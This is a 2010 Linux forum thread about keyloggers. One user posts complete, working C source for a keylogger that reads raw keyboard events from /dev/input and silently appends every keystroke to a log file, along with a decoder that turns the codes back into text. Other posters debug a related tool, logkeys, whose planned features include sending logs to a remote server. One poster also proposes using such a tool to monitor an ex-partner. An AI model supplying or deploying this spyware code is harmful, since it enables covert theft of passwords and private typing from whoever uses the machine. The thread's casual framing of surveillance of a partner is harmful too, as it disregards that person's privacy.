Linux keylogger

H_TeXMeX_H · 01-05-2010, 03:01 AM

Well, it looks like other attempts have been posted in this thread, so ok, here it is, my awesome keylogger !

Actually I wanted a good keylogger, but couldn't find any, so I decided to write one, and so I did, with some code from another project.

Benefits of this keylogger:
Works with USB keyboards ! (tested with 2 different keyboards)
Uses no noticeable CPU time ! (this cannot be said for any other Linux keylogger that I have tried, and was a must for me, most of them use 100% CPU time)
Is minimalistic (3 includes, 2 ints, 1 file, 0 libs, 21 lines of effective code) ! (I like minimalistic)

There are two parts to the keylogger, the keylogger, and the decoder.

NOTE: Most code was taken from:
ventriloctrl-0.4
http://public.callutheran.edu/~abark...trl-0.4.tar.gz
findkey.c

so probably the license is their license (really I only change a few things to make this into a keylogger):

Code:

Copyright (c) 2006 Purkka Productions
                         Toni Spets <toni.spets@gmail.com>
                         Markus Lindqvist <markus.lindqvist@gmail.com>

Permission to use, copy, modify, and distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

Here's the keylogger:

PHP Code:



#include <linux/input.h>
#include <fcntl.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc < 2)
    {
        printf("usage: %s <device>\n", argv[0]);
        return 1;
    }
    
    // !init
    struct input_event ev;
    
    // init
    int fd = open(argv[1], O_RDONLY);
    FILE * infile = fopen ( "/var/log/keylog" , "a" );
    unsigned int i = 0;

    while (read(fd, &ev, sizeof(struct input_event)))
    {
        if (ev.type == 1 && ev.value != 0)
        {
            fprintf(infile, "%i\n", ev.code);
            i++;
            if (i == 5)
            {
                i=0;
                fflush(infile);
            }
        }
    }
    return 0;
}

To run it you first run:

Code:

bash-3.1$ cat /proc/bus/input/devices 

I: Bus=0003 Vendor=045e Product=00b0 Version=0111
N: Name="Microsoft Microsoft® Digital Media Pro Keyboard"
P: Phys=usb-0000:00:1a.0-1/input0
S: Sysfs=/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1:1.0/input/input9
U: Uniq=
H: Handlers=kbd event9 
B: EV=120013
B: KEY=1000000000007 ff800000000007ff febeffdff3cfffff fffffffffffffffe
B: MSC=10
B: LED=107

I: Bus=0003 Vendor=045e Product=00b0 Version=0111
N: Name="Microsoft Microsoft® Digital Media Pro Keyboard"
P: Phys=usb-0000:00:1a.0-1/input1
S: Sysfs=/devices/pci0000:00/0000:00:1a.0/usb3/3-1/3-1:1.1/input/input10
U: Uniq=
H: Handlers=kbd event10 js0 
B: EV=10001f
B: KEY=837fff002c3027 bf00444400000000 c00000000000001 10f848a27c007 ffff7bfad941dfff febeffdfffefffff fffffffffffffffe
B: REL=40
B: ABS=ffffff01000701ff
B: MSC=10

Although there are two entries for my keyboard here, the one for event9 works, so you would run the program like follows:

Code:

keylogger /dev/input/event9

and it will log everything typed on the keyboard as numbers to /var/log/keylog. Now, there is a catch in that it writes to this file every 5 keystrokes (average length of English word), but you can change that if you want, it has to do this because the user may shutdown the computer (or the computer may crash) and we wouldn't know when. Of course, you can redesign it to write to the file at shutdown.

Now, it writes only numbers so you need a program that interprets the log. So you would write something like:

This I release under GPLv2, because I wrote it alone.

The decoder:

PHP Code:



#include <stdio.h>
#include <stdlib.h>

int main (void)
{
    FILE * infile;
    FILE * outfile;
    int num;

    // open infile for reading text
    infile = fopen ( "keylog" , "r" );
    if ( infile == NULL ) { fputs ("ERROR: failed to open input file 'keylog' !",stderr); exit (1); }

    // open outfile for writing text
    outfile = fopen ( "keylogout" , "w" );
    if ( outfile == NULL ) { fputs ("ERROR: failed to open output file 'keylogout' !",stderr); exit (1); }

    // parse infile
    while (fscanf(infile, "%d", &num) != EOF)
    {
        switch (num)
        {
            case 2:
                fprintf(outfile, "1");
            break;
            case 3:
                fprintf(outfile, "2");
            break;
            case 4:
                fprintf(outfile, "3");
            break;
            case 5:
                fprintf(outfile, "4");
            break;
            case 6:
                fprintf(outfile, "5");
            break;
            case 7:
                fprintf(outfile, "6");
            break;
            case 8:
                fprintf(outfile, "7");
            break;
            case 9:
                fprintf(outfile, "8");
            break;
            case 10:
                fprintf(outfile, "9");
            break;
            case 11:
                fprintf(outfile, "0");
            break;
            case 12:
                fprintf(outfile, "[");
            break;
            case 13:
                fprintf(outfile, "]");
            break;
            case 14:
                fprintf(outfile, "B");
            break;
            case 15:
                fprintf(outfile, " ");
            break;
            case 16:
                fprintf(outfile, "'");
            break;
            case 17:
                fprintf(outfile, ",");
            break;
            case 18:
                fprintf(outfile, ".");
            break;
            case 19:
                fprintf(outfile, "p");
            break;
            case 20:
                fprintf(outfile, "y");
            break;
            case 21:
                fprintf(outfile, "f");
            break;
            case 22:
                fprintf(outfile, "g");
            break;
            case 23:
                fprintf(outfile, "c");
            break;
            case 24:
                fprintf(outfile, "r");
            break;
            case 25:
                fprintf(outfile, "l");
            break;
            case 26:
                fprintf(outfile, "/");
            break;
            case 27:
                fprintf(outfile, "=");
            break;
            case 43:
                fprintf(outfile, "|");
            break;
            case 58:
                fprintf(outfile, "L");
            break;
            case 30:
                fprintf(outfile, "a");
            break;
            case 31:
                fprintf(outfile, "o");
            break;
            case 32:
                fprintf(outfile, "e");
            break;
            case 33:
                fprintf(outfile, "u");
            break;
            case 34:
                fprintf(outfile, "i");
            break;
            case 35:
                fprintf(outfile, "d");
            break;
            case 36:
                fprintf(outfile, "h");
            break;
            case 37:
                fprintf(outfile, "t");
            break;
            case 38:
                fprintf(outfile, "n");
            break;
            case 39:
                fprintf(outfile, "s");
            break;
            case 40:
                fprintf(outfile, "-");
            break;
            case 42:
                fprintf(outfile, "S");
            break;
            case 44:
                fprintf(outfile, ";");
            break;
            case 45:
                fprintf(outfile, "q");
            break;
            case 46:
                fprintf(outfile, "j");
            break;
            case 47:
                fprintf(outfile, "k");
            break;
            case 48:
                fprintf(outfile, "x");
            break;
            case 49:
                fprintf(outfile, "b");
            break;
            case 50:
                fprintf(outfile, "m");
            break;
            case 51:
                fprintf(outfile, "w");
            break;
            case 52:
                fprintf(outfile, "v");
            break;
            case 53:
                fprintf(outfile, "z");
            break;
            case 54:
                fprintf(outfile, "S");
            break;
            case 29:
                fprintf(outfile, "C");
            break;
            case 57:
                fprintf(outfile, " ");
            break;
            case 28:
                fprintf(outfile, "\n");
            break;
            case 69:
                fprintf(outfile, "N");
            break;
            case 98:
                fprintf(outfile, "/");
            break;
            case 55:
                fprintf(outfile, "*");
            break;
            case 74:
                fprintf(outfile, "-");
            break;
            case 71:
                fprintf(outfile, "7");
            break;
            case 72:
                fprintf(outfile, "8");
            break;
            case 73:
                fprintf(outfile, "9");
            break;
            case 78:
                fprintf(outfile, "+");
            break;
            case 75:
                fprintf(outfile, "4");
            break;
            case 76:
                fprintf(outfile, "5");
            break;
            case 77:
                fprintf(outfile, "6");
            break;
            case 79:
                fprintf(outfile, "1");
            break;
            case 80:
                fprintf(outfile, "2");
            break;
            case 81:
                fprintf(outfile, "3");
            break;
            case 82:
                fprintf(outfile, "0");
            break;
            case 83:
                fprintf(outfile, ".");
            break;
            case 96:
                fprintf(outfile, "\n");
            break;
            case 105:
                fprintf(outfile, "<");
            break;
            case 106:
                fprintf(outfile, ">");
            break;
            case 103:
                fprintf(outfile, "^");
            break;
            case 108:
                fprintf(outfile, "!");
            break;
        }
    }

    // close files
    fclose (infile);
    fclose (outfile);

    return 0;

This parses it properly ONLY for the dvorak keyboard layout, you'll have to change the numbers for qwerty or whatever layout you use. It also reads the log file from the current directory, if you want you can change keylog to /var/log/keylog to read from there directly.

That's it. Anyway, don't use this for spying on people. Keyloggers are legal, but spying on people is not, unless of course you work for the gubmint ...

kernc · 01-05-2010, 11:40 AM

Quote:

Originally Posted by roscogruen

is this "logkey" from a trusted repo? what is the repo? i don't find logkey in the ones i use.

things have changed: logkeys is new. :P
it isn't in repositories yet as it is still in (public) alpha stage. you can, however, download logkeys source and follow the instructions in the README file. the usual `./configure && make && make install` should work, i believe.

logkeys is trusted, the functionallity of emailing logs/POSTing to remote server is in the works, the source is available to be examined.

note, none of these keyloggers work with USB yet. why not is really beyond my level of understanding.

regardless of the next few posts, logkeys keylogger works with USB keyboards as well.

Quote:

Originally Posted by H_TeXMeX_H

Well, I recently wrote a rather nice keylogger

well, our implementations rely on the same event interface, only mine does steps 1, 2 and 3 automatically (and comparing the length of both sources i agree it definitely should

).

as you appear knowledgeable enough, sir, may i kindly ask that you try out my creation, especially with your dvorak-style keyboard? you may need to --export-keymap first and fix it in places, but that is expected, i guess.

could you please report back? thanks a ton!

H_TeXMeX_H · 01-08-2010, 09:14 AM

You say that none of the keyloggers work with USB yet, well, I have a USB keyboard and I tried my keylogger on another computer with a different USB keyboard and it works fine on both. So I'd say mine works with USB.

EDIT:

I have tried logkeys as you suggested, but it really doesn't seem to work with my keyboard. It just doesn't output any log file no matter what. Maybe it really doesn't support USB as you said.

kernc · 01-09-2010, 01:22 AM

Really??
Neither with --device option and correct device path (e.g. /dev/input/event9)?

logkeys also reads input event device and if yours works, do you have any idea why mine doesn't?

EDIT: issue was since solved.

H_TeXMeX_H · 01-09-2010, 05:04 AM

Yeah I ran:

Code:

touch test.log
logkeys -s -o test.log -d /dev/input/event9

No output at all. Not with event10 either.

I do notice that you are using a similar method to the one use by ventriloctrl and by thus my keylogger here. So here is my theory on why it does not work for you. While I was writing this keylogger I wanted to make a program like the one you wrote that not only caught these key press events (numbers) but also dynamically converted them to letters and outputted them directly to a file. I realize quickly that this was not going to work, my keylogger behaved exactly like yours when I tried this, it wouldn't output anything. I have a feeling that this is because while reading the input event, these events appear and disappear too quickly to be processed by the program. Maybe this can be solved by some type of buffer ? Not sure. But either way, every time I tried to do too much processing before reading the next key event it would not longer work. So what I thought would be a good solution is to just dump all the key press events to a file and convert these later to letters, so this is what I did.

gilk · 01-09-2010, 10:26 AM

Quote:

Originally Posted by cpbills

this might be something i'd be interested in working on...

if i get anything done, roclok, it'll be a perl script to attach to whatever logfile evdev logs to...

i can see the uses for this, in a non-cracker facility...

for example, my ex isn't quite trustworthy, and i still let her in my apartment, etc...

it'd be interesting to see if she was snooping around on my computers while i'm away...

use a camera.... she might be snoping not only in your computer...

kernc · 01-10-2010, 07:51 AM

Quote:

Originally Posted by H_TeXMeX_H

EDIT:

I have tried logkeys as you suggested, but it really doesn't seem to work with my keyboard. It just doesn't output any log file no matter what.

Wait... WHAT?
It doesn't even produce a logfile with the 'Logging started...' header line?
In that case, can you please confirm that the following code works for you?

Code:

#include <sys/file.h>
#include <cstdio>
#include <cstdlib>
#include <cerrno>
#include <unistd.h>

int main(int argc, char *argv[]) {
  umask(0177);
  stdout = freopen(argv[1], "a", stdout);
  if (stdout == NULL) {
    fprintf(stderr, "Error opening file '%s'", argv[1]);
    return EXIT_FAILURE;
  }
  setgid(65534); setuid(65534); // become 'nobody'
  printf("successfully printed to file %s\n", argv[1]);
}

I'd really hate it to bang my head over errors that are not.

H_TeXMeX_H · 01-10-2010, 07:57 AM

It says "successfully printed to file (null)".

kernc · 01-10-2010, 09:08 AM

In order to not pointlessly spam this thread any longer I have sent you an email.
Thanks for your patience, H_TeXMeX_H!

EDIT: there was a bug present on 64bit architectures. it is now fixed thanks to the community.

krattai · 03-02-2010, 09:04 PM

I love the paranoia that happens every time someone mentions they want to capture keystrokes. ;-)

Aside from "to see if I can", there is certainly very valid reasons to do so. I believe someone earlier posted that they wanted to capture keystrokes and disallow those keys from touching a media player unless they were acceptable. That's the premiss that I'm working from.

Rather than logging or writing keystrokes to file (that's irrelevant in this context), the software will simply observe the keyboard and wait for certain keys to be pressed. When the keys are pressed, the software will then perform certain actions in preparation for the keystrokes to occur again. Like the media player example, the software needs to sniff the keyboard buffer and not grab and drop keystrokes since the software can't run in the foreground and the keystrokes are important to the applications that are in the foreground so the keystrokes must remain in the buffer.

I've tried modifying uberkey and it was working great in tests, until I moved it to its final platform which only has USB keyboard capability. I'm very happy to have found this thread, although it wasn't easy.

I'll try to use the two competing products above "as is", but have a sneaky suspicion I'll have to use some combination of the two or three (including uberkey). If either of you, texmex and kernc are interested and watching the thread, I'd be happy to discuss what I'm trying to accomplish and maybe we can share some code and ideas.

In the mean time, I'll report any results and observations that I get through the process as I can.

kernc · 03-03-2010, 01:22 AM

Quote:

Originally Posted by krattai

... the software will simply observe the keyboard and wait for certain keys to be pressed ... not grab and drop keystrokes since the software can't run in the foreground ...

using event subsystem and parsing keypresses from /dev/input/eventX will do just that, provided your X doesn't exclusively grab your keyboard device first. if logkeys works on your final platform, this method is I believe the easiest that will work for you.

krattai · 03-04-2010, 02:02 AM

Quote:

Originally Posted by kernc

using event subsystem and parsing keypresses from /dev/input/eventX will do just that, provided your X doesn't exclusively grab your keyboard device first. if logkeys works on your final platform, this method is I believe the easiest that will work for you.

It was quite interesting to see both the onboard keyboard of the laptop I'm testing on and the USB keyboard both throwing characters to stdout, yet having different buffers.

The appliance that this will be running on has a USB keyboard controller on it and I'm hoping that each appliance will be using the same /dev/input/eventX so that a simple drive mirror will allow the key capture to work, hardcoded, on each appliance.

Otherwise, do you or anyone know of a function that would grab the event id of a keyboard? A second keyboard would be placed on the system when maintenance is happening. This second keyboard wouldn't have to provide the same functionality, although it would be interesting and maybe even nice to be given that option.

kernc · 03-04-2010, 11:30 PM

Quote:

Originally Posted by krattai

do you or anyone know of a function that would grab the event id of a keyboard?

logkeys extracts the id from /proc/bus/input/devices with a simple shell script using grep.
this method should work, assuming listed devices are ordered by id.

if you find a better method, please share.

fakie_flip · 03-07-2010, 08:06 PM

xspy can display all keystrokes to stdout of a certain X display with backtrack 4 though it may be patched against in other distros.

roscogruen · 03-08-2010, 12:13 AM

Quote:

Originally Posted by krattai

I love the paranoia that happens every time someone mentions they want to capture keystrokes. ;-)

i agree. the first ten times i asked on forums and chat groups about a keylogger, i met a volley of "why do you need one?" or "get rid of the person making the keystrokes," etc. Getting rid of the problem, rather than fixing it is the usual response i get.

i will try the keylogger kernc suggests, again.